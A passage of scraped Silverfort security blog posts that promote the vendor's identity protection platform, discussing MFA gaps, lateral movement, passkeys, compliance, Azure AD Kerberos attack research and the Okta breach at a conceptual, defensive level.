Ransomware Spread Drilling down into the true purpose of these protections, what’s clear is that is really about preventing identity threats (i. e. , any type of attack or attack component) that involve the use of compromised credentials for malicious access. The most prominent examples of these are account takeovers, lateral movement, and ransomware spread. And this is a big deal because these are precisely the threats that introduce the highest operational risk to organizations today. So let’s understand why. Identity Threats Are the Ultimate Damage Accelerators in Cyber Attacks Today So why is identity threat protection a critical necessity? Let’s use the ransomware example to better understand why. Ransomware attacks always start with an initial compromise of a workstation or server that then provides the adversary with an initial foothold in the targeted environment. At this point, though, the damage is confined to just a single machine. The X factor here is the lateral movement stage, where the adversary uses compromised credentials to log in and access additional machines in the environment until they reach a position that will enable them to plant the ransomware payload on as any machines as possible. Now, the attack has evolved from a local, single-machine event to one that could actually halt business operations. How the Checkbox Mentality Puts Environments at Risk This is exactly what MFA and PAM solutions are supposed to stop. So you can see how a compliance checkbox mentality comes up short. In order to block identity threats, MFA and PAM protection must encompass all users, resources and access methods. Anything less than that leaves adversaries an open door. However, traditional MFA and PAM technology limitations make achieving this type of coverage practically impossible. The checkbox mentality is especially dangerous because both regulators and management may be satisfied because best effort was showed. As well, identity teams may feel like they’ve done their jobs to the best of their abilities. However, it’s really the adversaries will be the most satisfied, since their operations will be able to continue without detection. And to a large extent, this is unfortunately the identity protection status quo in many organizations today. What Are the Technology Barriers That Prevent MFA and Privileged Access Control From Being Deployed Across the Entire Environment? Now, let’s understand what the challenges are in ensuring that all users, resources, and access methods are protected. Traditional MFA: Agent-Dependent With No Coverage for Active Directory Authentication Protocols Traditional MFA products either require installing agents on the protected servers and workstations or else placing proxies in front of network segments. What this means in practice is that that there will always be machines without protection — either because they can’t accept additional agents or because the network architecture is too complex. The second limitation is even more problematic. Active Directory’s (AD) authentication protocols, including NTLM and Kerberos, were written long before MFA technology came into being. This makes MFA protection inapplicable to the wider portion of AD authentication. So authentications via command-line access tools that have been built over these protocols – such as PsExec, Remote PowerShell, and WMI (all of which are extensively used by admins for connecting to remote machines) – cannot be protected. This is exactly why these are the tools of choice for lateral movement attacks. The inability to protect them with MFA means that once an adversary has managed to obtain compromised credentials, there’s no way to stop them from accessing as many resources as they want. Privileged Access Protection: An Arduous Deployment Process With No Protection for Service Accounts While PAM is considered as the straightforward way to protect privileged accounts, it’s also subject to two key limitations that significantly limits its effectiveness. The first is an extremely long and tedious onboarding process, which entails the manual discovery of all privileged accounts that need protection as well as sperate integrations with every individual component of the IT infrastructure. The second is a fundamental mismatch between PAM’s vaulting and rotation security mechanisms and the nature of machine-to-machine service accounts. Onboarding these accounts to the PAM is essentially impossible because: 1) there is no utility that can provide instant visibility into these accounts, making their discovery a painstaking and often impossible effort, and 2) even after the discovery of a service account, there is still no visibility into its source and target machines or the apps that it runs. Without this information, you simply can’t apply password rotation to the account without the risk of breaking any processes it manages. The result of these gaps in MFA and privileged account protection is the reason they’ve become a key attack surface that adversaries target with great success. Silverfort Unified Identity Protection: MFA Everywhere and Automated Discovery, Monitoring, and Protection for Service Accounts Silverfort has pioneered the first purpose-built Unified Identity Protection platform that can extend MFA to any user and resource, automate the discovery, monitoring, and protection of service accounts, and proactively prevent lateral movement and ransomware spread attacks. Silverfort connects to all Domain Controllers and other on-prem Identity Providers (IdPs) in the environment for continuous monitoring, risk analysis, and access policy enforcement on every authentication and access attempt made by users, admins, or service accounts to any user, system, and environment. Identity and security teams use Silverfort’s platform to easily implement the required 360-degree coverage their environments need to gain protection against identity threats. Do you need to increase the coverage of your MFA protection across all your users and systems, or get visibility and protection into your service accounts? Schedule a call with one of our experts. --- - Published: 2023-02-22 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/passwords-end-with-passkeys/ The death of passwords has been declared continuously by the security community but now it might stick with the introduction of passkeys. In this blog, we will provide an overview of the evolution of password security, contrasting it with more modern authentication methods. We will also highlight and provide a better understanding of the passwordless authentication gaps that attackers are exploiting and explore the benefits of passkeys.   The History of Password Security  Password security has been evolving over the years. From taking a simple password and making it more complex by introducing special characters and/or longer passwords. While this made it harder to crack the password, this solution did not solve the problem of stolen or divulged passwords which are utilized in identity-based attacks. As password security continued to evolve, multi-factor authentication (MFA)– combining something you know (as a password) with something you have (a numeric token, fingerprint, RFID, etc. ) – became the gold standard for authentication. While MFA continues to be a strong and very popular solution, it went a long way to help curtail the use of compromised passwords. However, there was still a fundamental issue – the password itself. Passwords inherently remained weak, easily broken, and always susceptible to social engineering attacks. Not to mention the inconvenience of humans needing to remember these passwords, which led to the trend of writing them down and in many cases reusing the same password everywhere to avoid remembering multiple passwords.   Password-Less Authentication  To strengthen password security. Passwordless authentication has become a more acceptable solution because it removes the human factor and inconvenience of creating and remembering a password and removes the ability for an attacker to remotely socially engineer or steal a password from a user. A common form of passwordless authentication is Passkeys. Passkeys are authentication credentials that become a sole, primary authentication that is more secure than any form of authentication based on a password and any other factor by encapsulating the core-tenets of multifactor into a single-authentication step. This makes it faster, easier, and more secure for the user.   Passkeys are based on two protocols: FIDO2 and webAuthN. These protocols have been proven to be resistant to threats such as phishing, credential stuffing, and man-in-the-middle (MiTM) attacks. Passkeys use your phone’s camera with a presented QR code, then use a physical device such as Yubikey, and/or biometric information such as your face as in Windows Hello or your fingerprint. Now, with passkeys and Silverfort, you can protect your network identities with MFA without the need to download a third-party application. Third-party applications are commonly used in cyber-attacks, and leaving them behind helps the security aspect even more.   Silverfort-More Password-Less  As an additional step in the authentication process, Silverfort can implement passkey and bridges it to applications, service accounts, command-line interfaces, and other platforms that otherwise cannot support this modern authentication type. Silverfort’s capabilities allow organizations and industries to bridge multiple-authentication types such as traditional multi-factor and passkeys into a ubiquitous identity solution for our customers. Silverfort provides the identity control plane and empowers customers to deploy user access control policies to govern access to critical and sensitive resources in their environment.  To learn more, request a demo here. --- - Published: 2023-02-07 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/compliance-with-ccop-identity-protection-requirements-made-easy-with-silverfort/ The Cybersecurity Code of Practice for Critical Information Infrastructure 2. 0 is an enhancement of the first version that was released in 2018. This cyber security standard is intended to specify the minimum cybersecurity requirements that organizations that operate Critical Information Infrastructure (CII) should implement. This applies to all components of an IT or OT system and/or network infrastructure of a CII and includes physical devices and systems, software platforms and applications of the CII. All organizations that subject to CCOP, must implement, or show significant adoption of the guidelines and practices it outlines by Date 4 July 2023. Silverfort enables CII operators to make a great step towards this goal by addressing the identity protection aspect of CCOP, including the implementation of least privileged access policies, protection of privileged accounts, comprehensive MFA protection, and Domain Controller protection. Planning your CCOP Implementation Journey Full implementation of CCOP requirements can materially increase an organization’s attack surface, as well as equip it with efficient tools to detect, respond, and remediate both commodity and advanced cyberattacks. However, such implementation is not achieved in a fortnight. The urging question CII security stakeholders is what the best path to close the various gaps between the current security posture of their environments is and the one CCOP demands. In simple terms it boils down to: ‘Both product X and product Y check important CCOP boxes, which should come in first? ’. In an ideal world with endless budgets and security personnel the answer would be ‘Both. Now. ’ However, in the real world the prioritization is inevitable. The Prioritization Rule: Most Value in Shortest Time As most security practitioners would know, there are two factors that outrank all others. The first is the security value – what is the delta a prevention, detection, or response capability of a certain product adds over what you have now. However, not less important is the time to value aspect, i. e. how long does it take to get this product up and running to deliver the security delta you chose it for. Too often these contradict, with security products that carry a great protection promise but take significant time and resources to deploy, or the other way around – instant deployment that yields low security returns. None of these groups can qualify as a starting point for CCOP compliance journey. Rather, security stakeholders’ radar should search for the security products and categories that maintain a fair balance between the security and time-to-value factors. Starting with Identity Protection Yields the Highest Security Return Identity threats is the term that describes all the attacks that utilize compromised credentials to for malicious access to targeted resources. The most prominent examples would be account takeover, malicious remote connection to the internal environment, and lateral movement. Over 70% of ransomware attacks, for example, utilize compromised credentials to spread the ransomware payload in the network, thus materially increasing their attacks’ impact. There are over 20B of compromised credential circulating in the dark web and used regularly in adversaries’ cyber operations. The identity attack surface is the least protected in the IT environment today because, unlike malware, exploits or phishing attacks, a malicious access with compromised credentials is identical to a legitimate one, making it extremely hard to identify and block. CCOP Identity Protection Requirements: Least Privilege Access, MFA, Privileged Access Protection and Domain Controllers Monitoring Acknowledging its importance, CCOP dedicates significant attention to the protection, detection and response capabilities that increase the organization’s resilience to identity threats, with special focus given to the three following aspects: Attack Surface Reduction: Least privileged access The principal of leas privileged access dictates that every user account should be able to access only the resources it needs to perform its duties with no excessive access rights beyond it. In that case even the account gets compromised, the adversary can access only a limited number if resources. Attack Prevention (i): Privileged access protection Privileged accounts are one of the most targeted entities, due to their access privileges that many times encompass all machines and apps in the environment. As a result, it’s imperative for security teams to enforce proactive measures to prevent adversaries from utilizing them for malicious access. Attack Prevention (ii): Multi-Factor Authentication (MFA) The tested and proven solution against the use of compromised credentials is MFA, which can prevent more than 99% of account takeover-based malicious access. When implemented in a comprehensive manner MFA can completely void the risk of compromised credentials, as these alone no longer suffice to enable access to resources. Attack Detection: Domain Controller (DC) monitoring The DC is the nerve center of on-prem environment and cloud workloads, and is, in practice, the target of almost every cyberattack, since dominating it enables adversaries unlimited access to any resource they desire. Circling back to the example of ransomware, it’s the DC compromise that enables ransomware actors to distribute the encryption payload across the entire environment. Hence, the ability to monitor DC activity and spot anomalies that indicate the presence of malicious activity is of utmost importance. Silverfort: Address all CCOP Identity Protection Challenges with Speed and Ease Silverfort pioneers the first purpose-built Unified Identity Protection platform that can extend MFA to any user and resource, automate the discovery, monitoring and protection of service accounts, and proactively prevent lateral movement and ransomware spread attacks. Silverfort connects to all the Domain Controllers and other on-prem Identity Providers (IdP) in the environment for continuous monitoring, risk analysis, and access policy enforcement on every authentication and access attempt that’s made by users, admins, or service accounts to any user, system, and environment. With Silverfort organizations can fully address all the described above CCOP identity requirements, making it an ideal first step in the CCOP compliance journey. Consolidating least-privileged access, privileged account protection, MFA, and DC monitoring in a single platform enables to show a distinct progression towards achieving the CCOP resilience goals, as well as securing the identity attack surface, which is nowadays at the very core of adversaries’ cyber operations. To learn the full details of Silverfort CCOP alignment together with a table that lists the explicit sections to which Silverfort’s protection applies download this solution brief. --- - Published: 2023-02-02 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/need-an-insurance-policy-against-ransomware-attacks-get-silverforts-free-identity-security-assessment/ Many organizations are struggling today with aligning their security controls with what underwriters now require in order to get cyber insurance coverage against ransomware attacks. From the identity protection perspective, even the initial discovery of MFA and administrative access gaps to address can be a severe challenge, due to a lack of tools that can reveal the security posture of all admin users and service accounts. This is why Silverfort is launching a free cyber insurance assessment offering — to assist organizations in this task and enable them to easily meet insurers’ requirements. What is Silverfort’s Free Identity Security Assessment? Silverfort’s free cyber insurance assessment enables cyber insurance applicants to overcome these obstacles by providing comprehensive visibility into all admin accounts that need MFA protection as well as into all service accounts, including their privilege level and activities. In addition, the assessment also uncovers any security hygiene issues that can expose the environment to identity threats, while also detecting any active ones already underway. With this information in hand, organizations can easily identify the identity security gaps preventing them from aligning with what insurers require, so they can resolve them to get the cyber insurance policy they need. Silverfort’s identity security assessment provides you with findings from the following types: Findings Type 1: Admin Users Visibility The most stringent requirements that insurers have is to apply MFA protection on all administrative access across various resources in the environment, such as directory services, networking infrastructure, command line access, and others. Silverfort’s assessment provides complete visibility into all admin users (including shadow admins you might not be aware of) and the resources they access, enabling you to easily see their existing level of MFA cyber insurance coverage and – in the case of any gaps – extend this protection to all necessary users and resources. Screenshot 1: Admin users visibility Findings Type 2: Service Accounts Discovery Another important aspect of cyber insurance eligibility is being able to demonstrate that you can monitor and protect your service accounts. Silverfort’s assessment provides you with complete visibility into your service accounts inventory and also shows you their privilege levels, source and destination, and the overall activity of each account. Most importantly, this assessment will enable you to determine whether any of these accounts is at risk or is behaving in an anomalous way that could indicate its compromise. Screenshot 2: Service accounts discovery Findings Type 3: Identity Security Hygiene Silverfort’s assessment tool can also identify security weaknesses in your environment that reduce its resilience to identity threats, exposing it to various attack methods. Examples of these include stale passwords in use, accounts with passwords that never expire, admin users with SPN (making them vulnerable to Kerberoasting attacks), as well as the use of any weak protocols like NTLM and NTLMv1. Resolving these previously undetected hygiene issues is a key step in reducing a threat actor’s ability to attack your environment. Screenshot 3: Identity security hygiene Findings Type 4: Active Identity Threats Silverfort’s risk assessment can also spot any live identity threats that are active in the environment at the time of the assessment. These include common lateral movement techniques (Pass-the-Ticket, Pass-the-Hash, etc. ), credential capture such as Kerberoasting, brute force attempts, and others that involve the compromise of credentials and use of them for malicious access. These techniques are what enable ransomware actors to spread within a targeted environment and escalate the impact of their attacks — from a single machine to an entire network. Screenshot 4 Active identity threats Take the Next Step with Your Identity Security Complying with all the new requirements for a cyber insurance policy can be a challenge, especially if you don’t have full visibility into your environment. Thanks to Silverfort’s free identity risk assessment, organizations can meet this challenge head-on. Uncover your security gaps, qualify for cyber insurance, and eliminate the threat of ransomware. Sign up today. --- - Published: 2023-01-25 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/bounce-the-ticket-and-silver-iodide-attacks-on-azure-ad-kerberos/ Silverfort research finds threat actors could attack new Microsoft cloud authentication protocol to steal or forge cloud tickets and carry out lateral movement   Summary  Silver Ticket and Pass the Ticket (PTT) are infamous legacy on-prem Kerberos attacks used to perform Lateral Movement in Active Directory. Marking another step towards the cloud, Microsoft recently made Azure AD Kerberos, their cloud-based implementation of the Kerberos protocol, generally available. Azure AD Kerberos enables authentication to cloud resources without having to use an on-premises Active Directory. Microsoft made security enhancements to this cloud variant of Kerberos; however, the attacks lie in the underlying logic of how the protocol operates, so fixing them would require Kerberos to be significantly re-engineered. It is not simply a case of patching flawed code. We’ve developed two variants of Pass the Ticket and Silver Ticket which work for Azure AD Kerberos. We named them Bounce the Ticket and Silver Iodide. These attacks expose infrastructure hosted by Azure, such as servers and storage, to malicious access. You can read the full technical analysis in this white paper. In accordance with responsible disclosure, both techniques were shared with Microsoft’s MSRC team prior to publication. We’d like to share our appreciation for the time and effort the company took to assess our research. As there is no specific fix, Silverfort urges enterprises to perform the following mitigations:  Review and monitor for any changes to Azure Access Control (IAM) and the share’s access control permissions to validate that only authorized users have permissions for the Microsoft. ClassicStorage/storageAccounts/listKeys/action - Kerberos key extraction operation. To avoid the Bounce the Ticket attack, reduce the number of computers allowed to hold cloud TGTs to the minimum required. You can do that by restricting the “Allow retrieving the Azure AD Kerberos Ticket Granting Ticket during logon” group policy to security groups that use Azure AD Kerberos. Read the full white paper here --- - Published: 2023-01-19 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/whats-new-with-silverforts-service-accounts-protection-capabilities/ The new year has only just begun, and thanks to the ongoing work of the Silverfort team with the help of feedback from our customers, we have released our latest product version 4. 7. We revamped the screen look & feel and introduced new features and capabilities for our service account offering, which we are thrilled to share. This is a major step in a multi-layered effort to overhaul and continuously improve Silverfort’s service account feature. You can upgrade your Silverfort platform to the latest version 4. 7 and see the new service account capabilities that we offer in action. But let’s take a closer look at a few of the main new features. New Look & Feel Hello darkness, my old friend. We at Silverfort are continuously committed to making light work of detecting and protecting service accounts. Today, we’re happy to announce our new dark mode for the service account screen. Silverfort's Service Account Screen Why Dark Mode? Many users have come to expect dark mode options in the solutions they use, ourselves included. It can be a bit disorienting to have a single tool you use all day be in light mode when much of your workflow outside of it remains dark. Naturally, we wanted to ensure that moment is no longer a part of your life working with your service accounts. Hence: Dark Mode for service accounts with Silverfort! New Categorization of Service Accounts When organizations deploy hundreds or thousands of service accounts, it is challenging to know where to start to secure them. To help admins prioritize which accounts they should be dealing with, Silverfort categories each kind of service account into the following categories:  Machine to machine (M2M) – used exclusively by machines to interact with other machines or services (for example, a Web container that communicates with a database container) Hybrid – used for M2M access but also used by human users to access resources (for example, database administrators who run scripts from their user accounts to connect to servers) Scanners - used from a few devices to communicate with a large number of resources inside a network (for example, a vulnerability scanner) Others - including both dormant (inactive) and accounts removed by administrators Silverfort divides the identified service accounts into categories By categorizing every single service account being employed, admins can now easily find and prioritize the service accounts that need to be secured. Updated Filtering Silverfort helps further customize the detection and protection of service accounts. Admins can now filter the list of service accounts for high-priority accounts, newly detected accounts, and accounts with specific risk indicators. Silverfort's filters to check for new service accounts or investigate risk indicators Advanced-Data Enrichment In this latest version update of service accounts, admins can add the account owner of the service account from their Active directory. Having an account owner for each service account provides more transparency if any changes are done to the service account and an understanding of who made the modifications. Furthermore, admins will be able to add more account info for each service account by adding texts from the service accounts screen. On top of the new service account owner capabilities, we now show the number of hits per source and destination. This help admins prioritize the different sources and destinations that their service accounts connect to, to ensure they are properly monitored and protected. Silverfort displays a list of sources and destinations using the service accounts, as well as the number of hits (authentications) Service Accounts Policies Based on Protocols Service accounts typically use only specific protocols, for recurring tasks. This allows admins to create policies that will block accounts from using other protocols. Silverfort shows which policies are connected to each service account Faster Detection Time As we improve the overall features of our service account protection capabilities, we have also improved the time to detect new service accounts. New sources & destinations on existing service accounts will typically appear within 30 minutes. This will allow organizations of all sizes to quickly discover and protect their service accounts with the help of Silverfort. Stay Tuned for More At Silverfort, we continue to add new identity protection features for our customers. To learn more about service account detection and protection, read our help center article, and stay tuned for more product updates coming very soon. --- - Published: 2023-01-11 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/top-5-identity-protection-challenges-for-manufacturing-companies/ It is common knowledge that manufacturing is one of the most targeted verticals and that threat actors launch data theft and ransomware operations on manufacturing companies daily. What is less commonly known is that the rise of identity threats’ part within the overall threat landscape collides with security weaknesses that are unique to this vertical, increasing manufacturers’ risk exposure and the potential damage these attacks can cause. In this post, we’ll become familiar with the identity threats that manufacturing environments face, get to know the top five challenges they face when attempting to protect against them, and learn how Silverfort's Unified Identity Protection platform can assist identity and security teams to fully address these challenges and maintain their environments secure. Manufacturing Threat Landscape No sector is safe from the threat of incoming cyberattacks. This is especially true with manufacturing organizations for which the potential outcomes of a successful ransomware attack or data theft are severe due to a low tolerance for downtime and impact on production processes. IBM's X-Force 2022 Threat Intelligence Index showed that manufacturers were the most targeted industry due to a low tolerance for downtime and outdated security controls. Additionally, a Deloitte study highlighted that over 40% of manufacturing firms experienced a cyber-attack in the past year. Cyber attacks on manufacturing timeline Manufacturers' physical operations and valuable data have attracted the attention of threat actors due to manufacturers' unwillingness to deploy modern technology across their environments which results in demanding ransomware often successful. This new approach has made it difficult for organizations to detect, prevent and respond to attacks across their hybrid environments. Furthermore, adversaries are increasingly targeting manufacturers' employees to gain access to their critical credentials, data, and systems access. In manufacturing, employees’ threat awareness is generally considered a weak link or the low-hanging fruit for adversaries to target and open the door to move laterally across a manufacturer's environment. Manufacturing has an Identity Protection Challenge Manufacturers are increasingly adding more entry points into their environments as well as adding partners with unprotected third-party devices. This leads manufacturing environments to be more exposed to incoming identity-based attacks which are utilizing compromised credentials to gain access to manufacturing enterprise resources. Once a threat actor has gained access by utilizing compromised credentials, they’ll gain complete access to different resources such as legacy applications and systems. This malicious access would be followed by either exfiltration of sensitive IP or extortion under threat of shutting down operations. The typical manufacturer is not equipped with the proper identity protection controls to detect and prevent such attacks like in the scenario above where malicious actors authenticate with valid but compromised credentials. This is especially true when it comes to protecting legacy applications. The Security Challenges that Manufacturers are Facing  The different identity protection challenges that manufacturers are facing should be a top priority for all manufacturing organizations. Here are the five most concerning identity protection challenges that manufacturers are facing. Legacy Applications Can’t be Protected with MFA Legacy applications were developed long before MFA technology was widely available, so they don’t natively support its incorporation in their default authentication process. To integrate MFA into a legacy application, organizations would need to make changes to the application’s code, which might cause friction to their operational continuity and hence is generally avoided. Furthermore, manufacturing applications are typically on-prem and authenticate to Active Directory over NTLM and Kerberos protocols, which also do not support MFA. Without MFA protection, legacy applications’ infrastructure and sensitive data are exposed to any adversary that has successfully gained initial access to the environment and obtained compromised credentials. Restricting Third-Party Access Manufacturers make extensive use of software that’s supported and maintained by third-party providers that routinely access their environment to perform various maintenance, administration, and management purposes of industrial processes. However, the manufacturer's security team has limited to no control over the security state of third-party users’ devices and very limited visibility into their actions and the risks they are subject to beyond their direct connection to its environment. As a result, threat actors often target the supply chain rather than the direct objective, as they rightfully assume it would be easier to accomplish. Compromising the third-party vendor’s user credentials allows attackers to gain access to the manufacturing environments, especially when least-privileged access is not enforced. Hybrid Environments A typical manufacturing environment today comprises on-prem workstations and servers (for both the shop floor and the IT network) and multi-cloud workloads, and SaaS applications. Fragmenting the different types of environments creates a disadvantage for security teams in having visibility into the full context of each user account’s behavior, significantly reducing their ability to detect an attempted authentication as malicious and trigger an MFA step-up. Moreover, the core part of this environment, such as the on-prem Active Directory one, doesn’t support MFA protection at all. Malicious actors exploit this weakness of the siloed visibility of each environment, to perform hybrid lateral movement attacks to move between the on-prem and the cloud uninterruptedly. Shared Accounts The common practice of different employees using the same credentials to access an application or machine is often implemented across manufacturing organizations. For example, ten production employees use the same user credentials to access a machine or a production application. While having one main account for several employees might be more comfortable, it creates major visibility and security risks. A malicious actor only needs to trick one of the employees to gain access to this account and move laterally across the manufacturer environment. IT/OT convergence Information technology (IT) and operational technology (OT) have always worked independently in manufacturing. From the various physical environments and applications, IT and OT systems were not designed to communicate with each other. As this gap continues to narrow and these networks become more connected, the attack surface for cyber threats is expanding significantly. IT/OT convergence allows OT devices to be accessible from the IT network by lateral movement. This triggers malicious actors to target manufacturers as the simple use of compromised credentials from the IT team can allow them to move laterally across the OT environments. The Solution: Silverfort’s Unified Identity Protection MFA Silverfort has pioneered the world’s first Unified Identity Protection platform that extends MFA and modern identity security to any user and resource, including the legacy applications that couldn’t be protected before. The Silverfort Unified Identity Protection Platform integrates with all Identity Providers (IDP) in manufacturers' hybrid environments to perform continuous monitoring, risk analysis, and adaptive access policies on all access attempts, made by all users, to all manufacturing resources. With Silverfort, access to resources is never granted based on credentials alone. Rather, Silverfort's risk analysis determines whether or not to allow access, augment the authentication with MFA verification, or block the access attempt altogether. Apart from the operational simplicity entailed in managing only one solution, Silverfort’s architecture enables manufacturers to have full MFA coverage across all on-prem and cloud resources in their hybrid environment. In this way, Silverfort overcomes all the challenges we’ve described in the previous sections: Legacy applications – the IdP forwards Silverfort all access requests, including those made by legacy applications, enabling Silverfort to protect them with MFA, regardless of whether the application supports MFA. Third-party access – Silverfort doesn’t require the installation of agents on the protected devices, enabling it to easily enforce MFA on access attempts to any resource, including ones made by external vendors. Hybrid environments – Silverfort’s integration with all IdPs, on-prem and in the cloud enables it to monitor and analyze the full authentication trail context of every user and extend MFA to the entire on-prem environment, including resources that couldn’t be protected before. Shared accounts- Silverfort’s integration with different MFA tokens allows admins to enroll different tokens for one account to multiple users. Silverfort provides FIDO2 key tokens to solve this issue. IT-OT Convergence- Silverfort enforces secure authentication and access policies across corporate networks, industrial networks, and cloud environments, including sensitive IT and OT systems that were considered ‘unprotectable’ until today.  To learn more about how Silverfort can help your manufacturing environments, request a demo here. --- - Published: 2023-01-10 - Modified: 2024-07-10 - URL: https://www.silverfort.com/blog/rethinking-your-zero-trust-implementation/ Despite becoming a bit over-marketed, zero trust is still one of the most important cybersecurity approaches for protecting your organization's data, devices and applications. The basic idea is built around the assumption that every attempt to access your infrastructure is malicious until explicitly proven otherwise - with no exceptions. Organizations have embraced zero trust with enthusiasm, supported by vendors keen to demonstrate how their solution adheres to the principles of zero trust. When it comes to zero trust for identity and access management, multi-factor authentication (MFA) has become the tool of choice, with more and more products forcing you to implement MFA rather than making it optional. MFA is a great enabler of zero trust for identity, but in its current form, does it really go far enough or cover enough to truly meet the definition of zero trust? Let’s take a closer look at the situation with what might be considered a silly analogy. Imagine you have a nightclub, and everyone has to line up to get in and show ID. This is the equivalent of a username and password. Your ID is recorded, and you’re free to enter – you know who they are. Unless, of course, it’s a fake or stolen ID. Some people trying to get in might look a bit young or their ID looks a bit suspicious. Perhaps they have been celebrating too hard, or just look like they’ll cause trouble, so that triggers an extra check like a 2nd piece of photo ID or a breathalyzer test. This is the equivalent of MFA - fail that and you can’t get in. The idea is to trigger that MFA test more often than not and with this setup, you’re feeling good about your nightclub security. But what about when a VIP arrives? Someone vouches for them, or they get recognized, so they just get ushered straight through. They have privileged access and this person can seemingly go anywhere or do anything because their “credentials” look right – it must be “them”. But are you really sure because no proper checks were done? They had the right “username and password” - i. e. they looked like someone famous, or someone said they were important. What about when a patron leaves the building for a couple of minutes and then wants to come back? If you have a pass-out process, you just let them back in, assuming they’re the same person as before with the same access rights. But what if it’s not the same person? And here’s a scenario you might not have thought about. You have a maintenance entrance in the back for tradespeople, staff etc. How many times can someone wearing hi-vis and carrying a ladder get in with no checks? Maybe they have an ID badge on their hi-vis vest, but no one checks it properly. They give the right name, say why they’re here and get let in. This is the equivalent of service accounts or PowerShell access. Once in, they can also move about freely with few checks because there’s no one guarding the maintenance door. With all these scenarios, we’ve assumed that the malicious activity through compromised credentials is going to come through the front door, and if that’s well protected, then we’ve implemented zero trust. However, malicious activity is more often looking for the back doors. Areas such as service accounts and access interfaces where traditional MFA can’t be applied, and compromised credentials are easier to exploit. The point is that zero trust means zero trust but achieving this all-encompassing level of zero trust around identity is hard. However, it’s not impossible. Let’s look at Silverfort’s unique approach to implanting this gold star standard of zero trust for identity and access management - that doesn’t require you to re-engineer your environment. We look at three pillars to achieving this standard... Pillar 1 - UnificationUnification refers to the ability to consolidate every authentication and access attempt across all on-prem and cloud resources to provide full visibility across your environment. You may have multiple identity access tools and these attempts could be made by human and machine users (service accounts) through any access interface, using any authentication protocol. So, consolidating and unifying access attempts breaks down these identity siloes to enable visibility and protection across the entire IT stack. On paper, this makes complete sense, but in reality, consolidating multiple authentication tools to gain that valuable single view of all authentication and access attempts is notoriously difficult. Hybrid environments worsen the problem because on-prem and cloud authentication tools don't talk to each other, so any insights gleaned by one tool won't be shared with another. As a result, you can never get that complete picture, and every tool must start its evaluation from scratch. For attackers, the gaps exposed by siloed programs and processes are ripe for exploitation. Pillar 2 | ContextContext is the ability to continuously create a behavioral baseline profile for every user account based on its entire authentication activity across all enterprise resources. In this way, context supports reliable and high-precision risk analysis for every new access attempt to determine whether or not a given user can be trusted to access a resource. In short, context allows us to know whether an authentication is legitimate or not – and not just based on the username or password, but other parameters such as whether a user's behavior is anomalous. It's important to note that the ability to create context will only be as good as your unification efforts. Multiple disparate risk evaluation engines acting independently don't allow you to build context around normal user behaviour because even with the best AI model, if it's only ingesting two-thirds of your data, you will have authentication blind spots in the remaining third of your data. Your AI engine needs to see 100% of the data to determine whether a given authentication is legitimate or malicious. Pillar 3 | EnforcementEnforcement refers to the ability to trigger secure access controls via configured policies across every type of user, access interface or resource. It prevents - in real time - any malicious activity that attempts to utilize compromised credentials to access targeted resources. In short, Zero Trust enforcement blocks malicious access attempts at the validation point. Existing tools can recognize the problem and provide an alert, but they cannot stop the activity immediately. For example, Active Directory can't block access if the user name and password are correct, and we know that implicitly trusting credentials alone will not protect against identity-based attacks using compromised user credentials. Adding to the problem is the vast number of alerts generated for IT teams across different tools, which makes it easy for an identity alert to be overlooked. You need to be able to combine rule-based enforcement - such as multi-factor authentication - with risk-based enforcement - such as an AI-based risk engine – in order to detect suspicious behavior and apply it to every access attempt in real-time. Unified Identity Protection Platform: Identity-Based Zero Trust In Practice Silverfort is the world’s first Unified Identity Protection platform that extends your existing MFA solution to all resources and access points to block identity-based attacks. For unification, Silverfort seamlessly integrates with all existing IAM solutions (such as AD, ADFS, RADIUS, Azure AD, Okta, Ping Identity, AWS IAM, etc. ), extending coverage to assets that, until today, couldn’t be protected. This includes: Legacy apps IoT devices Visibility and policy enforcement for machine-to-machine access IT infrastructure file systems, command-line tools and plenty more For context and enforcement, Silverfort analyses all on-premises and cloud environment access requests, enriching them with contextual data and an AI-based risk engine to meticulously assess the risk associated with each access attempt. Appropriate security policies are then applied to allow or deny user access, or request the user to perform additional authentication to validate their identity before making the decision. When Silverfort detects malicious activities, the security teams are immediately notified. Access is denied, and action can be taken, knowing with confidence that it is not a false positive - Silverfort has already completed the necessary groundwork. This is the only real way to implement a practical and actionable Zero Trust identity solution. If you’re serious about Zero Trust, Silverfort is the only real solution. For more information or a demonstration visit silverfort. com --- - Published: 2022-12-22 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/oktas-github-breach-insights-and-recommendations/ As recently reported, Okta recently experienced a security breach where the source code for its workforce identity cloud was stolen. As Silverfort partners with Okta, to protect our joint customers’ workforce identities we want to share with you our insights regarding this attack and subsequent precautionary steps organizations should take to strengthen their protection from the potential risk this introduces. No Immediate Risk Detected First, it’s important to note that there is no immediate impact to any Okta customers, as Okta has found no unauthorized access to its service or customer data. Okta has taken the correct, responsible measures in response to this breach, including reviewing and fortifying their GitHub security as well notifying their customers. Immediate Concerns and Long-Term Implications There are, however, potential immediate and long-term implications of this breach. While Okta does not rely on the secrecy of their source code for the security of its services, its leak would enable adversaries to research it for vulnerabilities in a much easier manner — it’s highly likely that threat actors are engaged in this type of research right now, already planning the next steps of the attack. Additionally, considering this is one of several Okta breaches this year, it's likely that attackers are attempting to target Okta customers by compromising Okta’s service and infrastructure. Since Okta stores users’ passwords, this risk should be addressed. Okta Breach Potentially Exposes the Active Directory Environment to Malicious Access Therefore, Silverfort recommends a zero-trust approach to protect identities in Okta. The most effective solution against compromised passwords is multi-factor authentication (MFA). While Okta provides MFA to SaaS and web applications of its customers, it does not support the Active Directory (AD) environment with similar protection. Since passwords stored in Okta are usually synced with Active Directory, this lack of MFA creates a critical exposure to malicious access via compromised credentials. Silverfort and Okta Integration Protects the Active Directory Environment The integration between Silverfort and Okta enables Okta users to extend MFA protection to the entire Active Directory environment, creating an additional protection layer to mitigate possible adversary actions following the Okta breach. Use Silverfort Free Identity Threat Monitoring to Increase Resilience Silverfort offers a free 60-day identity threat monitoring package for Okta customers that have their Active Directory and Okta users synced. You can activate this free offering here. With Silverfort, you can perform the following mitigation steps: Continuous Monitoring Attack Surface Management: Monitor any AD authenticated system, legacy app, command line interface (CLI), or OT system that may have synced passwords with Okta. Active Attacks: Monitor for detected identity threats and leverage Silverfort’s identity data for a rapid and efficient response. Silverfort’s Identity 